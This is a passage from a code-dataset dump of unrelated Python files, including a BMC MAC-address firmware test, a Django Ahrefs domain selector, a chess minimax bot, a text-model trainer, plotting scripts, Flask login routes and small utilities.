time.sleep(10)\n \n # 3. Reset non-volatile data and verify\n self.log('INFO', 'Reset all non-volatile data then verify MAC address is not changed')\n _sp.non_volatile_data_reset(0x01)\n _sp.reset_fw_upgrade_after_nv_data_recover()\n _sp.uart_set_mux(0x03, ['kcs'])\n \n got_list_mac = _bmc.get_mac(['kcs', 'console'])\n if got_list_mac != new_list_mac:\n raise Exception('FAIL', 'After reset non-volatile data and firmware upgrade reset,\\\n BMC MAC address is unexpectedly changed. Expected MAC is [%s], actual MAC is [%s]'\\\n % (' '.join(hex(i) for i in new_list_mac), ' '.join(hex(i) for i in got_list_mac)))\n self.log('INFO', 'MAC address is verified expected after reset non-volatile data')\n time.sleep(10)\n \n # 4. Reset BMC and verify\n self.log('INFO', 'Cold reset BMC then verify MAC address is not changed')\n _sp.reset_bmc_cold_reset()\n \n got_list_mac = _bmc.get_mac(['kcs', 'console'])\n if got_list_mac != new_list_mac:\n raise Exception('FAIL', 'After BMC cold reset,\\\n BMC MAC address is unexpectedly changed. Expected MAC is [%s], actual MAC is [%s]'\\\n % (' '.join(hex(i) for i in new_list_mac), ' '.join(hex(i) for i in got_list_mac)))\n self.log('INFO', 'MAC address is verified expected after BMC cold reset')\n time.sleep(10)\n \n # 5. Cold reset BMC and host then verify\n self.log('INFO', 'Cold reset BMC and host then verify MAC address is not changed')\n _sp.reset_bmc_cold_reset_host_cold_reset()\n _sp.go_to_host_os()\n \n got_list_mac = _bmc.get_mac(['kcs', 'console'])\n if got_list_mac != new_list_mac:\n raise Exception('FAIL', 'After BMC and host cold reset,\\\n BMC MAC address is unexpectedly changed. Expected MAC is [%s], actual MAC is [%s]'\\\n % (' '.join(hex(i) for i in new_list_mac), ' '.join(hex(i) for i in got_list_mac)))\n self.log('INFO', 'MAC address is verified expected after BMC and host cold reset')\n time.sleep(10)\n \n # 6. Update BMC then verify\n self.log('INFO', 'Update BMC main partition then verify MAC address is not changed')\n self._update_bmc()\n \n got_list_mac = _bmc.get_mac(['kcs', 'console'])\n if got_list_mac != new_list_mac:\n raise Exception('FAIL', 'After update BMC main partition,\\\n BMC MAC address is unexpectedly changed. Expected MAC is [%s], actual MAC is [%s]'\\\n % (' '.join(hex(i) for i in new_list_mac), ' '.join(hex(i) for i in got_list_mac)))\n self.log('INFO', 'MAC address is verified expected after BMC main partition update')\n time.sleep(10)\n \n # 7. Reset MAC address, IP source, IP and netmask\n self.log('INFO', 'Recover BMC MAC address')\n _bmc.set_mac(orig_list_mac)\n self.log('INFO', 'Recover BMC MAC address done')\n \n self.log('INFO', 'Recover IP source')\n _bmc.set_lan_ip_source(orig_int_ip_source)\n self.log('INFO', 'Recover IP source done')\n \n if orig_int_ip_source == 0x01:\n self.log('INFO', 'Recover IP address')\n _bmc.set_lan_ip_address(orig_list_ip)\n self.log('INFO', 'Recover BMC MAC address done')\n \n self.log('INFO', 'Recover net mask')\n _bmc.set_lan_netmask(orig_list_netmask)\n self.log('INFO', 'Recover BMC MAC address done')\n \n self.log('INFO', 'Wait 10s and BMC lan should work...')\n time.sleep(10)\n list_version = _bmc.get_device_id(['iol'])\n self.log('INFO', 'Get device ID via IOL success, BMC version: %d.%d' % (list_version[0], list_version[1]))\n \n def deconfig(self):\n # To do: Case specific deconfig\n CBaseCase.deconfig(self)\n\n def _update_bmc(self):\n \n # Get BMC image\n self.log('INFO', 'Get BMC image from release folder...')\n obj_bmc_bin = self.obj_release.get_image_by_type('bmc_main')\n if obj_bmc_bin == None:\n self.result(FAIL, 'BMC image is not found.')\n return\n \n # Record firmware version\n str_version = obj_bmc_bin.version()\n list_version = [int(str_version[0:2], 0), int(str_version[2:], 0)]\n \n # Copy BMC to TFTP root\n str_tftp_root_folder = Env.obj_tftp_server.root_folder() \n \n # Forrest: should consider file locker here. But fail to find proper option\n if obj_bmc_bin.str_file_name in os.listdir(str_tftp_root_folder):\n self.log('INFO', 'BMC image %s is already in TFTP root folder' % obj_bmc_bin.str_file_name)\n else:\n self.log('INFO', 'BMC image %s is not in TFTP root folder, copying...' % obj_bmc_bin.str_file_name)\n if obj_bmc_bin.copy_to(str_tftp_root_folder):\n self.log('INFO', 'Copy done.')\n else:\n self.result(FAIL, 'Fail to copy BMC image %s to TFTP root folder' % obj_bmc_bin.str_file_name)\n \n # Get file size\n int_bmc_size = os.path.getsize('%s\\\\%s' % (str_tftp_root_folder, obj_bmc_bin.str_file_name))\n int_bmc_size_mb = int(math.ceil(float(int_bmc_size)/1024/1024))\n \n _firmware = self.enclosure.sp.firmware\n \n # Check firmware upgrade status before init\n list_status = _firmware.new_get_firmware_update_status()\n int_status = byte_in_response(list_status, 1)\n if int_status != 0x00:\n raise Exception('Fimrware update status should be 0x00(idle) before init, but it is 0x%X now' % int_status)\n else:\n self.log('INFO', 'Firmware update status is idle')\n \n # Initiate firmware upgrade\n _firmware.new_init_firmware_update(0x02, int_bmc_size_mb)\n \n # Check firmware upgrade status after init\n list_status = _firmware.new_get_firmware_update_status()\n int_status = byte_in_response(list_status, 1)\n if int_status != 0x02:\n raise Exception('Fimrware update status should be 0x02(Ready for image transfer) after init, but it is 0x%X now' % int_status)\n else:\n self.log('INFO', 'Firmware update status is ready for image transfer after initialization')\n \n # Set target device\n _firmware.new_set_target_device('BMC Main SPI Partition')\n \n # Check firmware upgrade status after set target device\n list_status = _firmware.new_get_firmware_update_status()\n int_status = byte_in_response(list_status, 1)\n if int_status != 0x02:\n raise Exception('Fimrware update status should be 0x02(Ready for image transfer) before image transfer, but it is 0x%X now' % int_status)\n else:\n self.log('INFO', 'Firmware update status is still ready for image transfer after set target update device')\n \n # Set remote image path\n str_ip = Env.obj_tftp_server.ip()\n list_ip = map(lambda a:int(a,0), str_ip.split('.'))\n _firmware.new_set_remote_image_path(list_ip, obj_bmc_bin.str_file_name)\n \n \n # Check firmware upgrade status after set remote image path\n list_status = _firmware.new_get_firmware_update_status()\n int_status = byte_in_response(list_status, 1)\n if int_status != 0x02:\n raise Exception('Fimrware update status should be 0x02(Ready for image transfer) before image transfer, but it is 0x%X now' % int_status)\n else:\n self.log('INFO', 'Firmware update status is still ready for image transfer after set remote image path')\n \n # Transfer image\n _firmware.new_transfer_image()\n \n # Wait until complete\n _firmware.new_wait_until_transfer_complete()\n \n self.enclosure.sp.sel.start_reserve_sel_in_memory()\n \n # Flash image\n _firmware.new_flash_image()\n \n # Wait until complete\n _firmware.new_wait_until_flash_complete()\n \n if self.enclosure.sp.sel.check_matched_sel_from_memory(\\\n str_generator_id = '0x20', \\\n str_sensor_type = '0xC2', \\\n str_sensor_num = '0xE2', \\\n str_event_type = '0x6F', \\\n lst_event_data_and_mask = ['0xA0', '0xff', '0x00', '0xff', '0x10', '0xff']) != 0:\n raise Exception('FAIL', 'Fail to catch firmware upgrade complete SEL.')\n else:\n self.log('INFO', 'Firmware upgrade complete SEL is verified.')\n self.enclosure.sp.sel.stop_reserve_sel_in_memory()\n \n time.sleep(10)\n # Firmware upgrade reset\n self.enclosure.sp.reset_firmware_upgrade_reset()\n \n # Get BMC version\n list_updated_version = self.enclosure.sp.bmc.get_device_id()\n \n if list_version == list_updated_version:\n self.log('INFO', 'BMC version is verified after update. Version: %d.%d'\\\n % (list_version[0], list_version[1]))\n else:\n raise Exception('FAIL', 'Expected BMC version is %d.%d, actual version is %d.%d'\\\n % (list_version[0], list_version[1], list_updated_version[0], list_updated_version[1]))\n","sub_path":"case/develop/T2786_bmc_NonVolatileBMCMACAddr.py","file_name":"T2786_bmc_NonVolatileBMCMACAddr.py","file_ext":"py","file_size_in_byte":11378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"367710964","text":"from datetime import datetime, date, timedelta\n\nfrom django.shortcuts import render\nfrom django.db import connections\nfrom django.http import HttpResponse, JsonResponse\n\nfrom apps.spiders.models import SpiderBase, TLD, ExtraWord2Query\nfrom .ahrefs_api import ahrefs_api\nfrom .models import LogRequests\n\n\nclass Spider(SpiderBase):\n class Meta(SpiderBase.Meta):\n db_table = 'domains'\n\n\nclass UpdateAhrefs(object):\n \"\"\"\n only_show - parameter for analytic command\n \"\"\"\n\n def __init__(self, tld=False, limit=2, only_show=False, only_count=False):\n self.spider = Spider\n self.tld = tld\n self.limit = limit\n self.only_show = only_show\n self.only_count = only_count\n\n def get_domains4ahrefs(self):\n \"\"\"\n Select domain for checking Ahrefs data\n Additional constraints specified in ExtraWord2Query\n \"\"\"\n result = {}\n default_query = '''SELECT domain FROM domains WHERE use_level = 1\n AND ahrefs_checks_at IS NULL\n AND (http_status_code != 200 \n OR title IS NULL \n OR length(title) < 3\n OR title ILIKE '%Suspended%'\n OR title ILIKE '%Not found%'\n OR title ILIKE '%Empty%'\n OR title ILIKE '%Incorrect%'\n OR title ILIKE '%Timeout%'\n OR title ILIKE '%Construction%'\n OR title ILIKE '%index%'\n OR title ILIKE '%nginx%'\n OR title ILIKE '%TooManyRedirects%'\n OR title ILIKE '%ConnectionError%'\n OR title ILIKE '%default%'\n OR title ILIKE '%redirect%'\n OR title ILIKE '%Untitled%'\n OR title ILIKE '%Error%'\n OR title ILIKE '%DOCTYPE%' )'''\n if self.tld:\n tld = TLD.objects.get(tld_end=self.tld)\n result = self.get_tld_domains(tld, default_query)\n else:\n # Get all tld\n tlds = TLD.objects.filter(is_active=True)\n for tld in tlds:\n result = self.get_tld_domains(tld, default_query)\n\n if self.only_show:\n print(f\"Domains: {result}\")\n\n if self.only_show:\n return f\"FINISH: {datetime.now()}\"\n\n return result\n\n def get_tld_domains(self, tld, default_query):\n tld_query = ''\n words = ExtraWord2Query.objects.filter(tld=tld)\n for word in words:\n tld_query = default_query[:-1] + \\\n \"OR title ILIKE '%{}%' )\".format(word.like_word)\n\n if not self.only_count:\n tld_query += f' LIMIT {self.limit}'\n\n # print(f'default_query: {tld_query}')\n print(f'TLD: {tld.db_name()}')\n # Do request\n with connections[tld.db_name()].cursor() as cursor:\n cursor.execute(tld_query)\n rows = cursor.fetchall()\n rows_cnt = len(rows)\n\n if self.only_count:\n print(f\"Count:{rows_cnt}\")\n return f\"FINISH: {datetime.now()}\"\n\n if rows_cnt:\n lst = set(row[0] for row in rows)\n return lst\n else:\n print('No data from DB')\n return\n\n raise ValueError('No connection to DB')\n\n def write_data2db(self, domains_data):\n for domain, data in domains_data.items():\n # print(domain)\n tld = domain.split('.')[1]\n self.spider.objects.using(f'db_{tld}').filter(domain=domain).update(**data)\n\n @staticmethod\n def log_requests_ahrefs(self, domains):\n cnt_domains = len(domains) if domains else 0\n hash_domains = hash(str(domains)) if domains else 0\n print(f\"log_requests_ahrefs: {cnt_domains}: {hash_domains}\")\n LogRequests.objects.create(tld=self.tld, cnt_domains=cnt_domains,\n hash=hash_domains)\n\n def update_ahrefs_data(self):\n domains = set()\n domains = self.get_domains4ahrefs()\n self.log_requests_ahrefs(domains)\n\n # if domains:\n # print(f'domains: {domains}')\n # domains_data = ahrefs_api(domains)\n # # print(f'domains_data: {domains_data}')\n # self.write_data2db(domains_data)\n # return domains\n # return\n","sub_path":"apps/ahrefs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"241355692","text":"import chess\n\ndef minimax(board, depth, maximize):\n if board.is_checkmate():\n return -40 if maximize else 40\n elif board.is_game_over():\n return 0\n\n if depth == 0:\n return boardValue(board)\n\n if maximize:\n bestValue = float(\"-inf\")\n for move in board.legal_moves:\n experimentBoard = board.copy()\n experimentBoard.push(move)\n value = minimax(experimentBoard, depth, False)\n bestValue = max(bestValue, value)\n return bestValue\n else:\n bestValue = float(\"inf\")\n for move in board.legal_moves:\n experimentBoard = board.copy()\n experimentBoard.push(move)\n value = minimax(experimentBoard, depth - 1, True)\n bestValue = min(bestValue, value)\n return bestValue\n\n return 0\n\ndef boardValue(board):\n boardString = board.fen().split()[0]\n pawnDiff = boardString.count(\"P\") - boardString.count(\"p\")\n rookDiff = boardString.count(\"R\") - boardString.count(\"r\")\n knightDiff = boardString.count(\"N\") - boardString.count(\"n\")\n bishopDiff = boardString.count(\"B\") - boardString.count(\"b\")\n queenDiff = boardString.count(\"Q\") - boardString.count(\"q\")\n\n return 1*pawnDiff + 3*bishopDiff + 3*knightDiff + 5*rookDiff + 9*queenDiff\n\nif __name__ == \"__main__\":\n gameBoard = chess.Board()\n\n while True:\n\n print(gameBoard)\n print(gameBoard.legal_moves)\n userMove = raw_input(\"Enter the move you want to make: \")\n gameBoard.push_san(userMove)\n\n if gameBoard.is_checkmate():\n print(gameBoard)\n print(\"User wins!\")\n break\n elif gameBoard.is_game_over():\n print(gameBoard)\n print(\"Tie game\")\n break\n\n minValue = float(\"inf\")\n minMove = None\n for move in gameBoard.legal_moves:\n experimentBoard = gameBoard.copy()\n experimentBoard.push(move)\n value = minimax(experimentBoard, 2, False)\n\n if value < minValue:\n minValue = value\n minMove = move\n\n gameBoard.push(minMove)\n if gameBoard.is_checkmate():\n print(gameBoard)\n print(\"Computer wins\")\n break\n elif gameBoard.is_game_over():\n print(gameBoard)\n print(\"Tie game\")\n break\n","sub_path":"Minimax.py","file_name":"Minimax.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"152671718","text":"import sys\nimport argparse\nimport os\nimport collections\n\n\ndef create_parser():\n \"\"\"Create command line parser.\n\n Create parser what can process all arguments.\n Input directory\n It's path to input directory, the files in this directory\n will be used for making model.\n Model file name\n It's name of model file, in this file will been writen the model.\n Convert to lowercase\n If user wants to convert all words to lowercase.\n :return parser: Parser with parameters.\n \"\"\"\n parser = argparse.ArgumentParser(\n prog=\"Script for collecting statistics to generation new text.\",\n description='''This program collects statistic on the source\n texts.''',\n epilog='''(c) March 2018, Kalmykov V.K.'''\n )\n parser.add_argument('--input-dir', help=\"Path to source directory\",\n type=str)\n parser.add_argument('--model', help='Path to result directory',\n type=str)\n parser.add_argument('--lc', action='store_true',\n help='Save texts in lowercase.')\n return parser\n\n\ndef get_filelist(input_directory):\n \"\"\"\n Get list of source files.\n\n Get list of source files(according to command line arguments).\n If there isn't input directory, filelist will contain only stdin.\n In another case filelist will contain all open files from filenames.\n :param input_directory: Input directory.\n :return filelist: List of source files.\n \"\"\"\n filelist = list()\n filelist.append(sys.stdin)\n if input_directory:\n filenames = os.listdir(input_directory)\n filelist.clear()\n for filename in filenames:\n filelist.append(open(input_directory + filename, \"r\"))\n return filelist\n\n\ndef prepare_line(line, is_lower):\n \"\"\"\n Prepare one line for appending into model.\n\n This function takes all words from line.\n :param line: Line of source text.\n :param commands: Command line arguments.\n :return: List of words in this line.\n \"\"\"\n good_line = \\\n ''.join(list(map(lambda c: c if c.isalpha() else ' ', line))).split()\n if is_lower:\n good_line = good_line.lower()\n return list(good_line.split())\n\n\ndef write_model(model, result_file):\n \"\"\"\n Write model.\n\n Write model to file in this format:\n In one line first word is the first word of pair, and then there is list of\n word-number_of_this_word.\n :param model: Model to write.\n :param result_file: Output file(ot stdout).\n :return: None.\n \"\"\"\n for first_word in model.keys():\n line = first_word\n for word, counter in model[first_word].items():\n line += ' ' + word + ' ' + str(counter)\n result_file.write(line + '\\n')\n\n\ndef add_pair(first_word, second_word, model):\n \"\"\"\n Add pair of words.\n\n Add pair of connected words in model of text.\n :param first_word: First word.\n :param second_word: Second word.\n :param model: Model of text.\n \"\"\"\n model.setdefault(first_word, collections.Counter())\n model[first_word][second_word] += 1\n\n\ndef run(args):\n \"\"\"\n Run program.\n\n Main function that run all program.\n 1. Creating parser of command line arguments.\n 2. Reading list of files.\n 3. Reading all files.\n 4. Writing model to file.\n :param args: Command line arguments.\n \"\"\"\n parser = create_parser()\n commands = parser.parse_args(args)\n result_file = open(commands.model, \"w\")\n list_of_files = get_filelist(commands.input_dir)\n model = dict()\n for file in list_of_files:\n line = file.readline()\n prev_word = None\n while line != \"\":\n word_list = prepare_line(line, commands.lc)\n for word in word_list:\n if prev_word:\n add_pair(prev_word, word, model)\n prev_word = word\n line = file.readline()\n file.close()\n write_model(model, result_file)\n\n\nif __name__ == \"__main__\":\n run(sys.argv[1:])\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"127382261","text":"\nimport numpy as np\nimport tensorflow as tf\nfrom tqdm import tqdm\n\nfrom python.dataset import AutoComplete\nfrom python.model import PureNLSTM\nfrom python.summary import ContextAccuracy\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\ntrain_dataset = AutoComplete(repeat=True, batch_size=64)\ntest_dataset = AutoComplete(dataset='test', repeat=False, batch_size=16)\nmodel = PureNLSTM(train_dataset, name='autocomplete_nlstm_600',\n embedding_size=600,\n verbose=True)\n\ncontext_accuracy = ContextAccuracy()\n\nfor output_i, output in enumerate(\n tqdm(model.predict(dataset=test_dataset), total=test_dataset.observations)\n):\n probabilities = output['probabilities']\n predict_sorted = np.argsort(probabilities, axis=1)[:, ::-1]\n\n source = test_dataset.decode_source(output['source'])\n target = test_dataset.decode_target(output['target'])\n predict = test_dataset.decode_target(predict_sorted)\n\n context_accuracy.add(source, predict, target)\n\nprint(context_accuracy.summary())\n","sub_path":"python/run/autocomplete_pure_nlstm_quantitative.py","file_name":"autocomplete_pure_nlstm_quantitative.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"578142908","text":"#!/usr/bin/env python3\r\nimport requests\r\nimport lxml\r\nfrom bs4 import BeautifulSoup\r\n\r\nname = 'Салтыков Андрей Юрьевич' # Ф.И.О.\r\namount_of_bills = '264' # Колличество баллов\r\nspecialty_number = 3 # Желательно ввести, поскольку при выборе порядок может поменяться. Номер специальности в списке на сайте ВятГУ\r\ntype_of_education = 1 # Бюджетные места: 1, Места с оплатой стоимости обучения: 2\r\n\r\ndef place_in_the_list(url, name, amount_of_bills):\r\n\r\n try:\r\n data = list(map(lambda x: list(map(lambda y: y.get_text(), x.find_all('td')[:3])), BeautifulSoup(requests.get(url).text, 'lxml').find_all('table')[-1].find_all('tr')[1:]))\r\n except:\r\n return 'Списка не существует'\r\n\r\n for i in data:\r\n if i[1] == name and i[2] == amount_of_bills:\r\n return i[0]\r\n return 'Нет в списке'\r\n\r\n\r\nstart_list_url = 'https://www.vyatsu.ru/php/pk/'\r\n\r\nwith open('specialty-list.txt', 'r', encoding=\"utf8\") as f:\r\n specialty_list = f.read()\r\nspecialty_list = BeautifulSoup(specialty_list, 'lxml')\r\nspecialty_list = list(map(lambda x: x.find_all('td'), specialty_list.find_all('tr')))\r\n\r\nif not specialty_number: \r\n print('Выберите направление:')\r\n for i in specialty_list:\r\n print(i[0].get_text() + '.', i[1].get_text()[9:])\r\n specialty_number = int(input())\r\n\r\nif not type_of_education and specialty_number not in [7, 36, 43, 45, 66]:\r\n print('Вид обучения:')\r\n print('1. Бюджет')\r\n print('2. С оплатой стоимости обучения')\r\n type_of_education = int(input())\r\nelif type_of_education == None:\r\n type_of_education = 2\r\n\r\nspecialty_urls_list = list(map(lambda x: list(map(lambda y: y.find('a').get('href') if y.find('a') != None else None, x[2:])), specialty_list))\r\n\r\nif type_of_education == 1:\r\n reception_tables_url = list(map(lambda x: start_list_url + x, specialty_urls_list[specialty_number - 1][:3]))\r\nelse:\r\n reception_tables_url = list(map(lambda x: start_list_url + x, specialty_urls_list[specialty_number - 1][3:]))\r\n\r\nplace = []\r\nprint('Подождите, происходит магия...')\r\n\r\nfor i in reception_tables_url:\r\n place.append(place_in_the_list(i, name, amount_of_bills))\r\n\r\nprint('Список поступающих:', place[0])\r\nprint('Список поступающих с оригиналами:', place[1])\r\nprint('Список поступающих, давших согласие:', place[2])\r\n\r\nprint(input())\r\n","sub_path":"check-place-in-the-list.py","file_name":"check-place-in-the-list.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"306172347","text":"import tkinter as tk\nfrom matplotlib.backends.backend_tkagg import (\n FigureCanvasTkAgg, NavigationToolbar2Tk)\n# Implement the default Matplotlib key bindings.\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# Hélice Conica\n\n# Hélice Circular\n\n# Corona Sinusoidal\n\n# Curva de Viviani\n\n# Hipopoda\n\n# Espiral Cónica de Papus\n\n# Curva de Arquitas\n\n# Horóptera\n\n# Curva Bicilindrica\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import animation\nimport matplotlib.pyplot as plt\n\n#Se crea funcion\n\ndef bicilindrica():\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n ab = fig.gca(projection='3d')\n\n a = 5\n c = 1\n b = 1\n theta = np.linspace(-4 * np.pi, 4* np.pi, 100)\n\n#Se da valor a las variables\n\n x1 = a*np.cos(theta)**2\n y1 = np.sqrt(-(b*2 - (2*c + a*(np.sin(theta))**2)))\n z1 = - c+a*np.sin(theta)\n z = c+a*np.sin(theta)\n x = a*np.cos(theta)**2\n y = np.sqrt(-(b*2 - (2*c + a*(np.sin(theta))**2)))\n N = 1000\n t= 10\n\n#Se aplica formula parametrica\n\n def gen(N):\n for theta in np.linspace(-4 * np.pi, 4 * np.pi, 100):\n x = a*np.cos(theta)\n y = np.sqrt(-(b*2 - (2*c + a*(np.sin(theta))**2)))\n z = c+a*np.sin(theta)\n yield np.array([x, y, z])\n\n\n def update(num, data, line):\n line.set_data(data[:2, :num])\n line.set_3d_properties(data[2, :num])\n\n\n def gen1(N):\n for theta in np.linspace(-4 * np.pi, 4 * np.pi, 100):\n x1 = a*np.cos(theta)\n y1 = np.sqrt(-(b*2 - (2*c + a*(np.sin(theta))**2)))\n z1 = - (c+a*np.sin(theta))\n yield np.array([x1, y1, z1])\n\n\n def update1(num1, data1, line1):\n line1.set_data1(data1[:2, :num1])\n line1.set_3d_properties(data1[2, :num1])\n\n\n data = np.array(list(gen(N))).T\n data1 = np.array(list(gen1(N))).T\n line, = ax.plot(data[0, 0:1], data[1, 0:1], data[2, 0:1])\n line1, = ab.plot(data1[0, 0:1], data1[-1, 0:1], data1[-2, 0:1])\n\n# Configuracion de ejes\n ax.set_xlim3d([-20.0, 20.0])\n ax.set_xlabel('X')\n\n ab.set_xlim3d([20.0, -20.0])\n ab.set_xlabel('Eje X')\n\n ax.set_ylim3d([-20.0, 20.0])\n ax.set_ylabel('Y')\n\n ab.set_ylim3d([20.0, -20.0])\n ab.set_ylabel('Eje Y')\n\n ax.set_zlim3d([-20.0, 10.0])\n ax.set_zlabel('Z')\n\n ab.set_zlim3d([20.0, -10.0])\n ab.set_zlabel('Eje Z')\n\n ani = animation.FuncAnimation(fig, update, N, fargs=(data, line), interval=10000 / N, blit=False)\n\n ani1 = animation.FuncAnimation(fig, update1, N, fargs=(data1, line1), interval=10000 / N, blit=False)\n\n\n plt.show()\n\nif __name__ == '__main__':\n # Creación de Ventanas\n root = tk.Tk()\n root.wm_title(\"Tarea 02 (15%)\")\n root.geometry(\"800x600\")\n\n # Crear frame contenedor de los elementos\n frame = tk.Frame(root)\n frame.pack(padx=20, pady=20)\n # Añadir titulo\n label = tk.Label(frame, text=\"Curvas Paramétricas Famosas\", height=\"2\")\n label.pack(fill=tk.X, expand=1)\n imagen = tk.PhotoImage(file=\"image.jpg\")\n boton = tk.button(master=frame, text=\"Curva Bicilindrica\", command=Bicilindrica, image=imagen)\n boton.pack(side=tk.BOTTOM, padx=10, pady=10)\n\n tk.mainloop()\n","sub_path":"interface/tarea02.py","file_name":"tarea02.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"401565842","text":"from app import app\nfrom flask import render_template, flash, redirect,url_for\nfrom app.app_login_form import LoginForm\nfrom flask_login import current_user, login_user\nfrom app.models import User\nfrom flask_login import logout_user\nfrom flask import request\nfrom werkzeug.urls import url_parse\n@app.route('/')\n@app.route('/index')\n@login_required\ndef index():\n return \"MY first flask script says hello world\"\n\n@app.route('/p1')\n\ndef p1():\n user = {'username': 'brother'}\n messages=[\n {\n 'sender':'human1',\n 'message':'iam a human'\n\n\n },{\n 'sender':'robot',\n 'message':'iam a robot'\n\n\n }]\n \n return render_template('firstPage.html',title=\"first page\", user=current_user,messages = messages)\n@app.route('/login',methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('p1'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user is None or not user.check_password(form.password.data):\n flash('Invalid username or password')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n return redirect(next_page)\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('index'))","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"14039767","text":"import json\nfrom time import sleep\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.views.generic import View\n\nfrom home.models import Questions\nfrom home.utils import define_expression, set_up_expression\n\n\nclass HomeView(View):\n\n def get(self, request):\n return render(request, 'home.html')\n\n def post(self, request):\n\n data = {\n 'systolic_bp': int(request.POST.get('sys_bp', '0')),\n 'diastolic_bp': int(request.POST.get('dias_bp', '0')),\n 'gender': request.POST.get('sex', ''),\n 'age': int(request.POST.get('age', '0')),\n 'abdominal_pain': True if request.POST.get('abd_pain', '') == 'on' else False\n }\n missed_params = define_expression(data)\n data['response'] = []\n rules_query = Questions.objects.all()\n for missed_param in missed_params:\n rules_query = rules_query.exclude(expression__icontains=missed_param)\n rules = rules_query.all()\n for rule in rules:\n if set_up_expression(parameters=data, expression_dict=rule.rule):\n data['response'].append({'question': rule.ask_question})\n sleep(1)\n return HttpResponse(json.dumps(data))\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"118578151","text":"import matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 设置图例字号\nmpl.rcParams['legend.fontsize'] = 10\nfig = plt.figure()\n\n# 设置三维图形模式\nax = fig.gca(projection='3d')\nax.legend()\n# 测试数据\n\ndef drawStatic(line):\n theta = np.ones(100)\n z = np.linspace(0, 8, 100) / 4\n for L in line:\n x = L[0]*theta\n y = L[1]*theta\n ax.plot(x, y, z, color='orange')\ndef drawCurve():\n z = np.linspace(0, 6, 100) / 4\n y = np.linspace(-2, 3, 100)\n x = -1.5*np.cos((y+2)*0.2*np.pi)+1.5\n ax.plot(x,y,z,color='red')\n# 显示图例\ndef drawDy1():\n y = np.linspace(1, -2, 100)\n x = -2/3*y+2/3\n z = np.zeros(100)\n for i in range(1,100):\n z[i] = 0.0002*i*i+0.01\n ax.plot(x, y, z, color='blue')\ndef drawDy2():\n x = np.linspace(1, 3, 100)\n y = -2*x+5\n z = np.zeros(100)\n for i in range(1,100):\n z[i] = 0.15*np.sqrt(i)\n ax.plot(x, y, z, color='blue')\n# 显示图形\n\nif __name__=='__main__':\n staticObstacle = [[2.2, 2]]\n drawStatic(staticObstacle)\n drawCurve()\n drawDy1()\n drawDy2()\n drawStatic([[0.5, -1.2]])\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('t')\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_zticks([])\n plt.show()","sub_path":"figCreate.py","file_name":"figCreate.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"573923653","text":"\n\"\"\"\nHabitica API\n\"\"\"\n\n\nAUTH_HEADER_CLIENT = 'x-api-user'\nAUTH_HEADER_TOKEN = 'x-api-key'\n\nAPI_BASE_URL = 'https://habitica.com/api/v2'\n\n\nGET_STATUS = API_BASE_URL + '/status'\n\nGET_USER = API_BASE_URL + '/user'\nGET_USER_ANONYMIZED = API_BASE_URL + '/user/anonymized'\n\nPOST_TASK = API_BASE_URL + '/user/tasks/{id}/{direction}'\n\nJSON_STATUS = 'status'\nJSON_UP = 'up'\nJSON_DOWN = 'down'\nJSON_ID = 'id'\nJSON_DELTA = 'delta'\nJSON_BUFFS = 'buffs'\n\nJSON_AUTH = 'auth'\nJSON_LOCAL = 'local'\nJSON_FACEBOOK = 'facebook'\nJSON_FORMAT_JSON = '_json'\nJSON_USERNAME = 'username'\nJSON_EMAIL = 'email'\nJSON_NAME = 'name'\n","sub_path":"wh_habitica/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"60131573","text":"n = 3\nwords =\t[\"tank\", \"kick\", \"know\", \"wheel\", \"land\", \"dream\", \"mother\", \"robot\", \"tank\"]\nanswer = []\nwordsCopy = []\nwordsCopy.append(words[0])\ncheckWord = words[0]\nfor i in range(1, len(words)):\n if(checkWord[-1] != words[i][0]) or words[i] in wordsCopy:\n answer.append(i%n+1)\n answer.append(i//n+1)\n print(answer)\n wordsCopy.append(words[i])\n checkWord = words[i]\nif answer is None:\n answer.append(0)\n 